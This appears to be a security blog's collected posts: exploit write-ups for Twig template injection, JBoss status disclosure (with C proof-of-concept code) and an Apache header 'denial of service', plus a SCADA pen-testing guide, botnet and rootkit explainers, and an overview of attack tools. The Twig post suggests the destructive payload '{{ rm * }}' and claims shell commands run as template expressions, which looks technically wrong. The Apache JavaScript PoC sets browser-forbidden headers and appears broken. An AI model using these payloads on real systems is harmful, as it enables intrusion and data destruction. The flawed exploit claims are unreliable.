Zero Day Twig PHP template engine

Twig is a modern template engine for PHP: flexible, fast and secure. If you have any exposure to other text-based template languages, such as Smarty, Django or Jinja, you should feel right at home with Twig. It’s both designer and developer friendly, sticking to PHP’s principles while adding functionality useful for templating environments.

ExploitDB link:

https://www.exploit-db.com/exploits/44102

Well, Twig {Latest version} is affected by Server-Side Template Injection and {{Command execution}}.

Exploit:

Twig <=2.4.4 contains an SSTI vulnerability which allows attackers to execute commands within the parameters, by using {{COMMAND TO EXECUTE}} instead of the expected values (a normal integer or normal string), depending on the vulnerable application, which takes different parameters by GET or POST.

1. POC:

Example: injecting this into a search parameter, http://localhost/search?search_key={{4*4}}, gives the output: 16

2. POC:

http://localhost/search?search_key={{4*4}}

http://localhost/search?search_key={{ls}}

OUTPUT: list of files/directories, etc.

See the screenshot below showing how it executes the command and prints out the results; this could also be {{ rm * }}, which would delete the entire application 🙂

JBoss sensitive information disclosure vulnerability

By requesting the status file with the full parameter set to true, JBoss prints sensitive information such as memory used, total memory and client IP addresses. Example: http://127.0.01/status?full=true

ExploitDB Link: 

https://www.exploit-db.com/exploits/44009/

Proof of Concept

//
//  main.c
//  JBoss information disclosure POC
//
//  Created by JameelNabbo  on 2/8/18.
//  Website www.jameelnabbo.com
//  LAB     www.uitsec.com
//  CopyRight © 2018 Jameel Nabbo. All rights reserved.
//

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>


int socket_connect(char *host, in_port_t port){
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;

    if((hp = gethostbyname(host)) == NULL){
        herror("gethostbyname");
        exit(1);
    }
    memset(&addr, 0, sizeof(addr));
    memcpy(&addr.sin_addr, hp->h_addr, hp->h_length); /* memcpy instead of the obsolete bcopy */
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;

    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock == -1){
        perror("socket"); /* check socket() before using the descriptor */
        exit(1);
    }
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));

    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
        perror("connect");
        exit(1);
    }
    return sock;
}

#define BUFFER_SIZE 1024

int main(int argc, char *argv[]){
    int fd;
    char buffer[BUFFER_SIZE];
    char request[512];
    ssize_t n;

    if(argc < 3){
        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
        exit(1);
    }

    fd = socket_connect(argv[1], (in_port_t)atoi(argv[2]));

    /* A complete HTTP/1.0 request: request line, Host header, blank line. */
    n = snprintf(request, sizeof(request),
                 "GET /status?full=true HTTP/1.0\r\nHost: %s\r\n\r\n", argv[1]);
    if(n < 0 || (size_t)n >= sizeof(request) || write(fd, request, (size_t)n) != n){
        perror("write");
        exit(1);
    }

    /* read() does not NUL-terminate: print exactly the bytes received, stop on EOF or error. */
    while((n = read(fd, buffer, BUFFER_SIZE)) > 0){
        fwrite(buffer, 1, (size_t)n, stdout);
    }
    if(n == -1){
        perror("read");
    }

    shutdown(fd, SHUT_RDWR);
    close(fd);
    return 0;
}

Solution:
Update to version 4.2.3 or later

How to perform a SAFE SCADA network penetration test

SCADA stands for Supervisory Control and Data Acquisition. In very simple terms, SCADA defines a type of control system that is used to control and monitor facilities and industrial infrastructure. Organizations use SCADA systems to automate complex industrial processes, detect and correct problems, and measure trends over time. SCADA systems are used in industries such as water management, building and facility management, traffic management, electric power generation, etc.

SCADA systems support various protocols such as DNP3, ModBus, IEC 60870, BACnet, LonWorks, and EPICS. In this blog post we’ll stick to discussing the ModBus over TCP protocol as it is still widely used in control systems.

ModBus is a serial communication protocol used to communicate with Programmable Logic Controllers (PLCs), and it can also be carried over TCP (port 502). Each device intended to communicate using Modbus is given a unique address. The devices communicate using a master-slave model where only one device (master or slave) can initiate a transaction (called a “query”). A slave is usually the end device on the SCADA network (valve, sensor, or meter reading) which processes information and sends its output to the master.

A ModBus frame consists of the target device address (or broadcast address), a function code defining the requested action, a data field, and an error-checking field. By default, ModBus has no authentication or encryption, but it can be transported over SSL/TLS to prevent sniffing, spoofing and replay attacks.

In the diagram above, a corporate and a SCADA network are separated by a firewall. I assume that the firewall rules are properly set and no access to the SCADA network is allowed. The three major components involved in SCADA are:

Human Machine Interface/Controller Machine: Usually a Windows workstation known as master used to manage and control PLCs on the network through client software. If compromised, an attacker gains access to everything on your SCADA network.

Programmable Logic Controller (PLC): A physical system connected to a power supply and network-enabled, with the capability to talk over Ethernet networks. It could have an LCD panel showing controller status, operator messages, etc. In recent times we have seen PLCs accessible via web browsers, Telnet and SSH, exposing them to all kinds of application- and network-layer attacks. If compromised, an attacker can manipulate the input/output of your devices and cause serious damage to the organization.

End Devices (Sensor, Valve or Pump): End devices installed at the remote site. They report to PLCs over communication links such as radio, serial connections, Ethernet or direct modems. If compromised, an attacker can compromise the integrity of the environment.

Note: The above components are standard in every SCADA network. You’d probably discover other devices as well such as database servers, serial device interfaces, etc.


Recently, SCADA systems have moved from proprietary, closed networks and systems to open systems and TCP/IP networks. This has exposed these networks to the same risks that traditional computer networks face. However, this does not necessarily mean that the approach for security assessment remains the same for SCADA assessments.

From my experiences in conducting SCADA assessments, I’ve noticed that every assessment is different, and on each occasion a unique approach is required based on the system functionality and type of industry it is deployed in. In this article I will share my experience performing a SCADA assessment, and discuss what pen testing approach and tools work best for assessing these highly sensitive systems.


How to prepare?

First you have to ask these questions:

  • Are all factory default credentials changed?
  • Is access to PLCs whitelisted to authorized machines only? They should not be reachable from everywhere.
  • Is the SCADA network separated from the rest of the network? If not, try reaching the PLCs from corporate workstations.
  • Is physical access to the SCADA control center restricted?
  • Can you access the internet from the controller machine?
  • Are there any clear text services running on the SCADA network?
  • Does the organization follow a strict password policy?
  • Are the controller machines, workstations and servers patched? Are they running anti-virus software and have application whitelisting enforced?


Practically, the chances that the organization will have a SCADA test/QA environment are slim. So, we assume that you have to perform an assessment on a live network, taking into account all due care. It is advisable to be prepared before the start of an assessment and ensure that all stakeholders receive communications during each phase of testing. The high-level approach to perform a SCADA assessment includes:


Draw a network map and understand the layout:

The primary purpose of studying the network architecture is to logically understand how each component of the SCADA environment relates to the others (beware, this will be highly complex). You should understand what components are involved and how they are segregated, connected or exposed to the wider network. This phase also involves identification of the various subnets present within the network. It is important to find out whether the corporate network is separated from the SCADA network or not.


Attacking:

Plan your attack carefully (this is not a normal IT environment: a simple error or an out-of-control action may result in a HUGE RISK).

After you have gathered enough information on what you need to test and which attacks are applicable, I recommend documenting each of the test cases before attacking the target. This will make you more organized when testing extremely sensitive and fragile systems.

Exploitation stage:

Execute each exploit individually. This will help you detect the root cause in case any device unexpectedly experiences failure conditions. If this happens, you should halt testing and inform the customer. You should attempt exploiting each of the components within the SCADA network i.e. network infrastructure, web interfaces, host operating systems, PLCs, HMI, workstations – just as you would do in a traditional network pen-test.

Tools:

Nessus (but you should control the request timing and perform the scan once for each IP)

smod: ModBus penetration testing framework

plcscan: Python script for scanning PLC devices

NMAP Scripts: NMAP script to scan PLC devices

Wireshark: Network sniffer

mbtget: Perl script to read data from PLC

plcinject: Tool to inject code into PLCs.


Conclusion:

SCADA systems are super sensitive, and sometimes you may face SCADA computers that run Windows XP with 1 GB of RAM, as one of my clients did, so control all your requests and monitor the network using Wireshark before generating any traffic.
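The ModBus frame layout described earlier, decoded in code, as an added example that is not part of the original post: a passive Modbus/TCP frame reviewer in Python that parses the MBAP header and PDU, validates the length field and flags state-changing function codes (writes, diagnostics) so a Wireshark capture can be reviewed before any active test is sent. The sample frames are constructed for this example, not taken from a real PLC; note that over TCP the serial error-checking (CRC) field is replaced by the MBAP header and the TCP checksum.

```python
"""Passive Modbus/TCP frame review (constructed example, not code from the original post):
parse the MBAP header and PDU, validate the length field and flag state-changing function codes."""
import struct
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple

MBAP_LEN = 7            # transaction id (2) + protocol id (2) + length (2) + unit id (1)
MODBUS_PROTOCOL_ID = 0  # the only value defined for Modbus/TCP
FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    8: "Diagnostics", 15: "Write Multiple Coils", 16: "Write Multiple Registers",
    23: "Read/Write Multiple Registers", 43: "Encapsulated Interface Transport",
}
STATE_CHANGING = {5, 6, 8, 15, 16, 22, 23}  # codes that alter process state or device behaviour
EXCEPTION_NAMES = {1: "Illegal Function", 2: "Illegal Data Address",
                   3: "Illegal Data Value", 4: "Server Device Failure"}


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes
    is_request: bool                     # True when sent master -> slave (TCP dst port 502)
    exception_code: Optional[int] = None

    @property
    def name(self) -> str:
        return FUNCTION_NAMES.get(self.function_code, f"Function {self.function_code}")

    def describe(self) -> str:
        """Summarise the PDU data field in human-readable form."""
        fc, d = self.function_code, self.data
        if self.exception_code is not None:
            reason = EXCEPTION_NAMES.get(self.exception_code, "unknown")
            return f"EXCEPTION {self.exception_code} ({reason}) to {self.name}"
        # Read requests, and multi-write requests/responses, start with address + quantity.
        if ((fc in (1, 2, 3, 4) and self.is_request) or fc in (15, 16)) and len(d) >= 4:
            addr, qty = struct.unpack(">HH", d[:4])
            return f"{self.name}: start={addr} count={qty}"
        if fc in (5, 6) and len(d) >= 4:    # single writes echo address + value both ways
            addr, val = struct.unpack(">HH", d[:4])
            return f"{self.name}: addr={addr} value=0x{val:04x}"
        if fc in (1, 2, 3, 4) and not self.is_request and d:
            return f"{self.name} response: {d[0]} data bytes"
        return f"{self.name}: {d.hex()}"


def parse_adu(raw: bytes, is_request: bool) -> ModbusFrame:
    """Parse one Modbus/TCP ADU (MBAP header + PDU); raise ValueError if malformed."""
    if len(raw) < MBAP_LEN + 1:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, uid = struct.unpack(">HHHB", raw[:MBAP_LEN])
    if pid != MODBUS_PROTOCOL_ID:
        raise ValueError(f"unexpected protocol id {pid}")
    if length != len(raw) - 6:            # length counts unit id + PDU (everything after itself)
        raise ValueError(f"length field {length} != {len(raw) - 6} bytes present")
    fc, data, exc = raw[MBAP_LEN], raw[MBAP_LEN + 1:], None
    if fc & 0x80:                          # exception response: high bit set, one code byte
        if is_request or len(data) != 1:
            raise ValueError("malformed exception response")
        exc, fc = data[0], fc & 0x7F
    return ModbusFrame(tid, uid, fc, data, is_request, exc)


def review_capture(frames: Iterable[Tuple[bytes, bool]]) -> dict:
    """Count frames per function and list every state-changing request (who wrote what, where)."""
    summary = {"total": 0, "malformed": 0, "exceptions": 0, "by_function": {}, "writes": []}
    for raw, is_request in frames:
        try:
            fr = parse_adu(raw, is_request)
        except ValueError:
            summary["malformed"] += 1
            continue
        summary["total"] += 1
        summary["by_function"][fr.name] = summary["by_function"].get(fr.name, 0) + 1
        if fr.exception_code is not None:
            summary["exceptions"] += 1
        if fr.is_request and fr.function_code in STATE_CHANGING:
            summary["writes"].append(f"tid={fr.transaction_id} unit={fr.unit_id} {fr.describe()}")
    return summary


# Constructed frames (hex), not a real capture; second element = direction (True = request).
SAMPLE_CAPTURE = [
    (bytes.fromhex("00010000000601030000000a"), True),            # read 10 holding regs from 0
    (bytes.fromhex("000100000017010314") + bytes(20), False),     # matching 20-byte response
    (bytes.fromhex("000200000006010600101234"), True),            # write single register 16
    (bytes.fromhex("00030000000b0110000000020400010002"), True),  # write 2 registers from 0
    (bytes.fromhex("000400000003018302"), False),                 # exception: illegal address
    (bytes.fromhex("000500010006010300000001"), True),            # bad protocol id -> malformed
    (bytes.fromhex("000600000006010800010000"), True),            # diagnostics sub-function 1
]

if __name__ == "__main__":
    print(review_capture(SAMPLE_CAPTURE))
```

Feeding it frames exported from Wireshark (payload bytes plus direction by TCP port) gives a baseline of which masters write to which units before any test traffic is added.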


Apache 2.2X denial of service HTTP header request

1. Description

Sending a crafted HTTP request whose Cookie header contains a dummy shellcode blob results in a 400 Bad Request response that echoes the dummy data; Apache displays the message “Size of a request header field exceeds server limit” and takes some time to handle the request.
Sending multiple such requests results in denial of service.

2. Proof of Concept

//Our function that sends HTTP requests to the target host
function httpGet(target)
{

	var dumpShellCode = "0x30, 0x53, 0x76, 0x99, 0xbc, 0xd7, 0x2, 0x34," 
    + "0x39, 0x5e, 0x7b, 0xc8, 0xbd, 0xfa, 0xff, 0x5b,"
    + "0xa2, 0xe7, 0xa, 0x2d, 0x38, 0x51, 0x40, 0x62, "
    + "0xab, 0xd0, 0xf9, 0x6, 0x2f, 0x4c, 0x6d, 0x89, "
    + "0x14, 0x77, 0x5a, 0xbd, 0x68, 0x93, 0x6e, 0xd0,"
    + "0x1d, 0xd2, 0x5f, 0x6c, 0x59, 0x98, 0xf2, 0xd5,"
    + "0x68, 0x69, 0x50, 0x93, 0xa2, 0x7d, 0xbc, 0x1e,"
    + "0xf, 0x64, 0x3d, 0xaa, 0x8b, 0xe8, 0xc9, 0x25, "
    + "0x78, 0x1b, 0x3e, 0xe1, 0x84, 0x9f, 0x4a, 0x7c," 
    + "0x31, 0xf8, 0x1, 0xae, 0x57, 0x52, 0x77, 0x13, "
    + "0xea, 0x8d, 0x94, 0x17, 0x6e, 0xf9, 0x88, 0x2a,"
    + "0xe3, 0x88, 0xb1, 0x3e, 0x67, 0x4, 0x25, 0xc1, "
    + "0x5c, 0x3f, 0xe2, 0xc5, 0xb0, 0x75, 0x59, 0x36," 
    + "0xf7, 0xea, 0xd7, 0xe4, 0x91, 0x6e, 0x53, 0x2f," 
    + "0x4e, 0x11, 0xf8, 0xdb, 0xaa, 0x85, 0x84, 0x66,"
    + "0x47, 0x1c, 0xf5, 0xe2, 0xc3, 0xa0, 0x81, 0x7d," 
    + "0xa0, 0xe5, 0xc, 0x2f, 0x46, 0x47, 0x72, 0xa4, "
    + "0xa9, 0xce, 0xeb, 0x38, 0x2d, 0x6a, 0x6f, 0xcb,"
    + "0xb2, 0xd5, 0xfc, 0x1f, 0x36, 0x61, 0xd0, 0xf2," 
    + "0xbb, 0xe0, 0x49, 0x56, 0x3f, 0xf6, 0x14, 0x37," 
    + "0xe6, 0xe7, 0xca, 0x2d, 0x18, 0x83, 0x5e, 0xc0," 
    + "0xa5";
	
	//HTTP Request Var 
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", "/", false ); // false for synchronous request
    
    //Now filling the headers information

    //Apache will respond with a 400 Bad Request that echoes the Cookie information, indicating that it can't handle the request because it exceeds the header field limit
    xmlHttp.setRequestHeader("Cookie",dumpShellCode);
    xmlHttp.setRequestHeader("Connection","Keep-alive");
    xmlHttp.setRequestHeader("Host",target);

    //sending the request
    xmlHttp.send( null );
    return xmlHttp.responseText;
}

httpGet("127.0.0.1"); 

3. Solution:

Update to version 2.4.29
http://ftp.itu.edu.tr/Mirror/Apache//httpd/httpd-2.4.29.tar.bz2

4. Download POC:
https://github.com/JameelNabbo/apacheDOS-POC

Learn how cyber criminals use BotNet

The reality is that there are millions of botnet-affected computers and other networking devices out there, yet identifying any of them is very hard. To the end user everything seems as it should be: no issues connecting to the internet and no problems on the PC itself. However, it might already have been turned into a zombie, also known as a bot.

The more compromised computers become bots, the larger and more powerful the actual botnet becomes. What happens is that each zombie computer calls home to what is called a C&C server (Command & Control). C&C is software; however, it runs on a server, so people refer to it as a C&C server.

The attacker can now control all the bots from the C&C server and do as he or she wishes.

Origin of Botnet

A botnet is so powerful that it doesn’t necessarily require anything to be clicked on, although of course you can find those types of botnets too. The reality is that, because of its malware nature, a botnet can be picked up from social networking sites, e-mails, free software downloads, YouTube videos and free movie downloads. Similarly to spyware, it can be obtained from many sources, and once your computer is affected it can start to spread to all the devices on the same network as the infected device. For example, if you have a computer, a laptop, an Xbox and a mobile phone on your home network and one of them is affected, believe me, all your devices will be affected. It can be self-spreading at some point; however, it usually starts when you download trusted free software from an untrusted source, which might contain a botnet hidden inside a Trojan. It might take another form, such as a dodgy e-mail saying that you have been chosen and have won x amount of money, so you must click on the link to claim your winnings. Again, when you click on that link, you don’t realize that the Trojan is already installing itself on your computer. Therefore it’s very dangerous, and nearly impossible to know whether your PC might already be a zombie. Additionally, it can come from infected media such as a USB stick, and nowadays even cheap smartphones bought from China can contain Trojans that spread to other networked devices and create a robot network.

Relation between the bot and the C&C Server

Imagine that a torrent movie is infected with a Trojan that contains a botnet, and around 2000 – 4000 people download it every day for the next three months; eventually, those 300,000 computers would become bots of a certain robot network. You might think, how on Earth would all those bots connect to a C&C server? First of all, 300K computers on the same botnet is an average number. Cyber security experts have previously compromised botnets as large as 30 million zombie computers, called BREDOLAB, which also ran under the alias OFICLA. This was a Russian botnet. It has now been compromised, but the reality is that we just don’t know, or at least cannot be sure, how many botnets are out there.

So back to the victim’s computer: once the botnet installs itself (the so-called BOT binary), it still has to find a way to connect to the C&C server so the two can communicate and exchange messages. The BOT binary can contain a hardcoded IP address that it advertises out to the internet so the C&C server can find its bots. However, there are other methods too. Another common way is that a particular domain name is written into the BOT binary and is used to find its master C&C server. Either way, once the zombie computer registers itself with the C&C server, it officially becomes a BOT, and the robot network army begins to grow.

Botnet purpose

There are good intentions too for some who create and use such botnets; however, as far as we know, there are very few. What I have heard is that in certain countries certain websites are blocked, so a few communities use botnets to access information that their government would not allow them to view under its laws.

The reality is that botnets are used mainly by the bad guys; to be more specific, by large underworld cyber criminal organizations.

Similarly to spyware, once your computer becomes a bot it can forward all sensitive information to its master, the C&C server: usernames, passwords, bank account information. However, the primary purpose of botnets goes deeper than that.

Some people build botnets only so that they can sell them to cyber criminals, and the larger the botnet is, the more value it has. Of course, certain botnets contain only bots from the US or from Europe, so those are a little cheaper; however, large botnets with bots all over the world in different continents are more expensive. A botnet consisting of a C&C server and 50-100 bots would be sold for between $200 and $800; however, it all depends on the location of the bots too. Taking this further, large cyber criminals have multiple botnets, each containing 10K+ zombie computers, which they rent out for an hourly or daily fee. Again it depends on the requirements, as well as the quantity of the bots and their location, but an average price for 5000 bots with a C&C server is around $100 for one hour, or $1000 per day.

When it comes to a botnet of 5000 bots, you have to understand that not all 5000 zombie computers can be used at the same time, as some of them might be turned off. However, I wanted you to understand the pricing when it comes to the marketplace.

Back to the purpose of botnets: some organizations use them to launch a DDoS attack (Distributed Denial of Service) against a particular company, perhaps against their competition, or as the revenge of an ex-employee. Either way, botnets can be used for attacks, but more and more they are used for financial gain, and that is Bitcoin mining.

Bitcoin mining is very popular; however, to mine Bitcoin you must have a huge amount of combined CPU power. Therefore large botnets can be perfect for this exercise. This process is also known as silent Bitcoin mining. However, it must be controlled accurately, because Bitcoin mining would use 100% of the CPU on all the bots, so the operators throttle it so that the victims don’t realize that their computer (bot) is silently mining Bitcoin.

Who is the behind the C&C Server?

As I mentioned, all the bots are centralized and controlled by the C&C server. Because of this centralized coordination, to take down such a robot network the source must be identified and caught. The reality is that such a bot master would always be very careful and would probably only log into the C&C server if it is fully secured. Of course, there is nothing more guaranteed than the multi-layered network called TOR.

The TOR network allows the bot master to be anonymous. It removes all traces of his or her identity, which makes the bot master untraceable.

How to avoid your computer becoming a zombie

The answer is simple – back to basics! Do not download software from untrusted sources; even if the software is free you must make sure that you are getting it from a trusted source. I recommend that you do not download torrents such as movies, music or video games, as the potential for those items to be infected is very high.

E-mails advertising things that are too good to be true: DO NOT OPEN them, period.

Your computer should not remember your usernames and passwords either. Also, if you buy a new laptop or desktop computer, you must change the passwords. Furthermore, just be careful and reasonable with the information presented to you. For example, if you are told you have won 1 million dollars and all you have to do is click on the link to claim it, when you didn’t even play anywhere, how would you win anything, right!? So again, do not click on anything that you are unsure of, especially weird programs that would supposedly help you achieve things like hacking into someone’s Facebook account.

You must (PURCHASE, NOT CRACK) an antivirus and update it regularly; second, you should install a firewall, even a virtual one, which would still help you identify whether you are affected. Next to that, you must always run the latest operating system, especially if you have Windows. Normally they issue upgrades to their software when they have found a vulnerability in the previous operating system, so the upgrade is required to patch those vulnerabilities.

How can a Rootkit bypass Windows 7 operating system’s kernel mode, code signing policy?

Microsoft has introduced a number of security features designed to prevent malicious code from running. But attackers are continually finding ways around those protections, an example is a rootkit that can bypass the Windows driver-signing protection.
The functionality is contained in the TDL4, TDSS and Alureon rootkits:

TDSS has been causing serious trouble for users for more than two years, and is an example of a particularly pernicious type of rootkit that infects the master boot record of a PC.

This type of malware is often referred to as a bootkit and can be extremely difficult to remove once it’s detected. The older versions of TDSS (TDL1, TDL2 and TDL3) are detected by most antimalware suites now, but it’s TDL4 that’s the most problematic.


TDL4 has a specific function that is designed to bypass a protection in Windows 7 and Windows Vista that requires kernel-level code loaded onto a machine to be signed. The Windows kernel-mode code signing policy is mainly applicable on 64-bit machines.

“Starting with Windows Vista, kernel-mode code signing enforcement is
implemented by a component known as Code Integrity. Code Integrity is a
feature that improves the security of the operating system by verifying
the integrity of a file every time that the image of the file is loaded
into memory. The function of Code Integrity is to detect if an unsigned
driver is being loaded into kernel-mode, or if a system binary file has
been modified by malicious code that may have been run by an
administrator,” Microsoft says in its explanation of the functionality.

The TDL4 rootkit has implemented a feature that evades this protection by changing the boot process on protected machines, according to an analysis of TDL4 by Sunbelt Software. The rootkit accomplishes this by going in and modifying which programs Windows will allow to load an unsigned driver.

“The boot option is changed in memory from the code executed by infected
MBR. The boot option configures value of a config setting named
‘LoadIntegrityCheckPolicy’ that determines the level of validation on
boot programs. The rootkit changes this config setting value to a low
level of validation that effectively allows loading of an unsigned
malicious rootkit dll file. The rootkit dll is kdcom.dll, which is an
infected version of the normal kdcom.dll that ships with Windows,” Sunbelt’s Chandra Prakash wrote in the TDL4 analysis.

“The rootkit also disables debuggers by NOP’ing debugger activation
functions as described below. This makes reverse engineering this rootkit
very difficult! The KdDebuggerInitialize1 function
in infected kdcom.dll called during normal execution of the system
installs the rootkit, which hooks the IRP dispatch functions of miniport
driver below the disk to hide its malicious MBR.”

Joe Johnson of Microsoft presented a talk about Alureon at the Virus Bulletin conference, and discussed the low-level capabilities of the rootkit. The presentation addresses the rootkit’s ability to get the Windows kernel to load a fake version of the legitimate kdcom.dll, but says that the malware does not actually bypass Kernel Patch Protection. In fact, it doesn’t have to because KPP doesn’t inspect all loaded drivers, only the code used by the kernel. Alureon patches the Windows Boot Configuration Data to make the machine think that what’s loading is Windows PE, rather than a normal version of Windows, which prevents code integrity checks from being performed.

Earlier versions of the TDL/TDSS rootkit were used in affiliate marketing programs and black hat SEO campaigns, were part of botnets, and had specific functionality designed to hide other malware programs. An analysis of the first three versions of TDL/TDSS by Kaspersky Lab researchers showed that the rootkit is not only quite advanced, but is under continuous development and refinement by a motivated, talented crew.

“Given that the cybercriminals have put considerable effort into
continuing to support this malware, fixing errors, and inventing various
techniques for bypassing signature-based, heuristic and proactive
detecting, TDSS is capable of penetrating a computer even if an
antivirus solution is installed and running. The fact that bot communication with the C&C is encrypted makes
it significantly more difficult to analyze network packets. An extremely
powerful rootkit component hides both the most important malware
components, and the fact that the computer has been infected. The victim
machine becomes part of a botnet, and will have other malware installed
to it. The cybercriminals profit by selling small botnets and using
blackhat SEO,” Sergey Golovanov and Vyacheslav Rusakov wrote. “As long as a malicious program is profitable, cybercriminals will continue to support and develop it.”

Easy backup android app

I’ve published my Easy backup Android app.

You can back up your Android phone and prevent your important data from being lost. You can save space on your phone by backing up and removing apps that are not frequently used.

The “Easy backup” app offers an easy way to back up your Android phone. When you need to back up your phone, just open the app and take a backup of the section you want.

Download it from Google Play for free.


Creating TreeView For MVC 5 Using my open source TreeView component

In this article we’re going to extend JS Tree from JS to MVC and render the HTML tags from the database using custom development in the model.

Basically, we’ll create a sample DB that contains main/sub categories with self-referencing; then we’ll add Razor-like support (@HTML.TreeView); and after that we’ll render the HTML tags (<ul> <li>) based on the relations in our database.

Let’s get started.

We will proceed with the following sections.

  1. Getting Started
  2. Creating the (Code First) model
  3. Creating TreeView Component
  4. Representing Data

Read the full article on C# Corner, including the source files:

http://www.c-sharpcorner.com/article/c-treeview-to-mvc-razor-view/


Network Attacks

Network Attack Types

There are two types of attacks in general: passive, meaning information is screened and monitored, and active, meaning the information is altered with the intent to modify or destroy the data or the network itself.

Without protecting your computer and system, your data might come under attack.

Your networks and data are vulnerable to any of these attacks if you have no protection and security plan:

1. Password-Based Attacks

Password-based access control is a common element of most operating system and network security plans. This means your access rights to a computer and its network resources are determined by your user name and your password.

Older applications do not always protect identity information as it is passed through the network for validation. This might allow an “eavesdropper” to gain access to the network by posing as a valid user.

2. Eavesdropping

In general, the majority of network communications occur in an unsecured or “clear text” format, which allows an attacker who has gained access to data paths in your network to “listen in” or interpret (read) the traffic.

When an attacker is eavesdropping on your communications, it is referred to as “sniffing” or “snooping”. In an enterprise, the ability of an eavesdropper to monitor the network is generally the biggest security problem that administrators face.

Without strong encryption services that are based on cryptography, your data can be read by others easily as it traverses the network.

3. Data Modification

After an attacker has seen and read your data, the next logical step he will most probably take is altering it.

An attacker can modify the data without the knowledge of the sender or receiver. Even if you do not require confidentiality for all communications, you do not want any of your messages to be modified in transit. For example, if you are exchanging purchase requisitions, you do not want the items, amounts, or billing information to be modified.

4. Identity Spoofing (IP Address Spoofing)

Most networks and operating systems use the IP address of a computer to identify a valid entity. In certain cases, it is possible for an IP address to be falsely assumed; this is identity spoofing. An attacker might also use special programs to construct IP packets that appear to originate from valid addresses inside the corporate intranet.

When an attacker gains access to the network with a valid IP address, he can modify, reroute, or delete your data and conduct other types of attacks.

When an attacker uses a valid user account, the attacker acts as the real user. Therefore, if the user has administrator-level rights, the attacker can also create accounts for subsequent access at a later time.

An attacker can do any of the following after gaining access to your network:

• Modify, reroute, or delete your data.

• Obtain lists of valid user and computer names and network information.

• Modify access controls and routing tables.

• Change server and network configurations.

5. Compromised-Key Attack

A key is a secret code or number that is needed to interpret secured information.

Although obtaining a key is a difficult and resource-intensive process for an attacker, it is possible.

After an attacker obtains a key, that key is referred to as a “compromised key”.

An attacker uses the compromised key to gain access and attack a secured communication channel without the sender or receiver being aware.

With the compromised key, the attacker can decrypt or modify data, and try to use the compromised key to compute additional keys, which might allow the attacker access to other secured communications.

6. Denial-of-Service Attack

A denial-of-service attack, unlike a password-based attack, prevents normal use of your computer or network by valid users.

The attacker can do any of the following after gaining access to your network:

• Block the traffic, resulting in a loss of access to the network by authorized users.

• Send invalid data to applications or network services causing unexpected behavior of the applications or services.

• Flood a computer or the entire network with traffic until an overload causes a shutdown.

• Randomize the attention of your internal Information Systems staff so that they do not see the intrusion immediately, which allows the attacker to make more attacks during the diversion.

7. Man-in-the-Middle Attack

A man-in-the-middle attack occurs when someone between you and the person with whom you are communicating is actively monitoring, capturing, and controlling your communication transparently.

When computers are communicating at low levels of the network layer, they might not be able to determine exactly with whom they are exchanging data.

For example, the attacker can re-route a data exchange.

Man-in-the-middle attacks are like someone assuming your identity in order to read your communications. The person on the other end may believe it is you because the attacker might be actively replying as you to keep the exchange going and get the desired information.

This attack is capable of the same damage as an application-layer attack.

8. Application-Layer Attack

An application-layer attack targets application servers by causing a fault in a server’s operating system or applications.

The attacker gains the ability to bypass normal access controls. The attacker takes advantage of this situation, gaining control of your application, system, or network, and can do the following:

• Read, add, delete, or modify your data or operating system.

• Introduce a sniffer program that analyzes your network and gains information that can be used to crash or to corrupt your network and systems.

• Introduce a virus program that uses your computers and software applications to copy viruses throughout your network.

• Disable other security controls to enable future attacks.

• Abnormally terminate your operating systems and data applications.

9. Sniffer Attack

A sniffer is an application or device that can monitor and capture network data exchanges and read the packets they contain.

If the packets are not encrypted, a sniffer provides a full view of the data inside them.

Even encapsulated (tunneled) packets can be broken open and read unless they are encrypted and the attacker does not have access to the key.

Using a sniffer, an attacker can do any of the following:

• Read your communications.

• Analyze your network and gain information to cause your network to crash and become corrupted.

That was the general overview of network attack types.

Let's move on to how hackers or cyber criminals execute these attacks.

To simplify things, most network attackers use powerful tools to gain access to the data on a network:

1. Metasploit Framework – an open source tool for exploit development and penetration testing, Metasploit is well known in the security community. Metasploit has exploits for both server and client based attacks, with feature-packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point-and-click network exploitation. This is the go-to tool if you want to break into a network or computer system.

Defending against Metasploit:

  • Keep all software updated with the latest security patches.
  • Use strong passwords on all systems.
  • Deploy network services with secure configurations.

2. Ettercap – a suite of tools for man-in-the-middle (MITM) attacks. Once you have initiated a man-in-the-middle attack with Ettercap, use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords is just the beginning; inject to exploit FTW!

Defending against Ettercap:

  • Understand that ARP poisoning is not difficult in a typical switched network.
  • Lock down network ports.
  • Use secure switch configurations and NAC if risk is sufficient.

3. sslstrip – using HTTPS makes people feel warm, fuzzy and secure. Using sslstrip, this security can be attacked, reducing the connection to an unencrypted HTTP session in which all the traffic is readable. Banking details, passwords and emails from your boss, all in the clear. It even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock, just to keep the user feeling warm and fuzzy.

Defending against sslstrip:

  • Be aware of the possibility of MITM attacks (arp, proxies / gateway, wireless).
  • Look for sudden protocol changes in the browser address bar. Not really a technical mitigation!

4. evilgrade – another man-in-the-middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not-so-good update. It can exploit the upgrade functionality of around 63 pieces of software including Opera, Notepad++, VMware, VirtualBox, iTunes, QuickTime and Winamp! It really whips the llama's ass!

Defending against evilgrade:

  • Be aware of the possibility of MITM attacks (arp attacks, proxy / gateway, wireless).
  • Only perform updates to your system or applications on a trusted network.

